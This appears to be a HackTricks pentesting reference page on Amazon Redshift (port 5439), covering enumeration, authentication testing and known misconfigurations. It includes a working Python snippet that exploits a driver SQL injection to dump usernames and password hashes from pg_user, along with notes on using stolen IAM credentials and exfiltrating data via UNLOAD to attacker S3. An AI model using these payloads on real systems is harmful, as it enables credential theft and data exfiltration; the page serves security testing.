5439 - Pentesting Redshift

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

This port is used by Amazon Redshift (AWS managed data warehouse). Redshift wire protocol is a slightly modified PostgreSQL protocol, so most Postgres client tooling works (psql, psycopg2, JDBC/ODBC) but auth and TLS requirements differ.

For more information check:

AWS - Redshift Enum - HackTricks Cloud

Enumeration & Connectivity

• Default port: 5439/TCP (customizable). Serverless workgroups also default to 5439.
• Public endpoint pattern: <clusterid>.<random>.<region>.redshift.amazonaws.com (public) or .redshift.amazonaws.com.cn (China). Serverless: <workgroup>.<random>.<region>.redshift-serverless.amazonaws.com.
• TLS: Redshift requires TLS 1.2+ and perfect-forward-secrecy ciphers. Old clients may fail; force modern TLS:

  psql "host=<endpoint> port=5439 user=awsuser dbname=dev sslmode=require"
  # or using redshift-psql wrapper
  

• Parameter group require_ssl controls if plaintext is allowed. New clusters/workgroups use default.redshift-2.0 with require_ssl=true, so downgrade/mitm is harder.

Quick enum with psql

# basic banner/version
psql "host=<endpoint> user=<u> dbname=dev" -c 'select version();'
# list dbs, users, privileges
\l
\du
select * from pg_user;
select * from svv_redshift_sessions;

Errors differentiate bad password vs missing user → potential username enumeration during brute force.

Authentication paths to test

• Database password for master user (often named awsuser) or created DB users.
• IAM auth tokens: generate short-lived credentials and connect via libpq/JDBC/ODBC using sslmode=require and authMech=IAM or plugin_name=com.amazon.redshift.plugin.OktaCredentialsProvider. Abuse stolen IAM creds/roles with rds-db:connect style permission equivalent for Redshift.

  aws redshift get-cluster-credentials --cluster-identifier <id> \
      --db-user pentest --db-name dev --duration-seconds 900
  psql "host=<endpoint> user=pentest password=<token> dbname=dev sslmode=require"
  

• IAM Identity Center / SAML / Azure AD plugins: JDBC plugin_name may spin up local webserver for SSO; captured loopback callback can leak SAML assertion or temp creds.

Common misconfigurations (network)

• Cluster marked PubliclyAccessible=true with wide-open SG (0.0.0.0/0) exposes Postgres-like surface for brute force or SQLi exploitation.
• Default port 5439 plus default SG allows easy discovery (Shodan/Censys). Changing port is minor obscurity but sometimes overlooked in hardening checklists.
• No enhanced VPC routing → COPY/UNLOAD go over public Internet; can be abused for exfil when attacker controls S3 bucket/endpoint.

Attack notes

• If login succeeds, Redshift lacks superuser in serverless; in provisioned clusters the master user has broad rights including creating UDFs (Python), external schema to Spectrum, COPY from attacker S3, and UNLOAD to exfil data.
• Check cluster parameter group for max_concurrency_scaling_clusters, require_ssl, enable_user_activity_logging – logging disabled aids stealth.
• Serverless workgroups still reachable via TCP; same SQL attack surface as provisioned clusters.
• Client-side metadata SQLi (Dec 2024): JDBC 2.1.0.31, Python connector 2.1.4 and ODBC 2.1.5.0 build metadata queries with unquoted user input in getSchemas/getTables/getColumns (CVE-2024-12744/5/6). If an app lets attackers control catalog or pattern arguments, you can inject arbitrary SQL that runs with the DB user used by the connector.

  # exploit vulnerable python connector 2.1.4 via metadata API
  import redshift_connector
  conn = redshift_connector.connect(host='<endpoint>', database='dev', user='lowpriv', password='pw')
  cur = conn.cursor()
  # injection in table_pattern leaks data from pg_tables
  cur.get_tables(table_schema='public', table_name_pattern="%' UNION SELECT usename,passwd FROM pg_user--")
  

• UDF execution model change: Python UDFs stop working June 30, 2026; only Lambda UDFs allowed after. Offensive impact: legacy provisioned clusters still run Python UDFs for in-cluster code exec (no FS/network). Lambda UDFs move code to Lambda where the IAM role may reach Internet/VPC endpoints for SSRF/pivot but with no direct cluster filesystem access. Hunting old clusters with Python UDFs enabled can still yield RCE primitives.

Recent security changes (offense impact)

• Public access disabled by default on new clusters/snapshots (Jan 10, 2025 change). Legacy ones may still be public.
• Encryption at rest + enforced TLS by default means sniffing/mitm harder; need valid credentials or SSRF into VPC path.
• Serverless VPCE rollout change (Jun 27, 2025): workgroup endpoints created in up to 3 AZs at creation time. Discovery tools should enumerate all workgroup VPCE DNS names per AZ to find reachable IPs.

References

• AWS Security Bulletin – SQLi in Redshift JDBC/Python/ODBC drivers (CVE-2024-12744/5/6)
• AWS Big Data Blog – Python UDF end-of-support and migration to Lambda UDFs (Jan 2026)

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.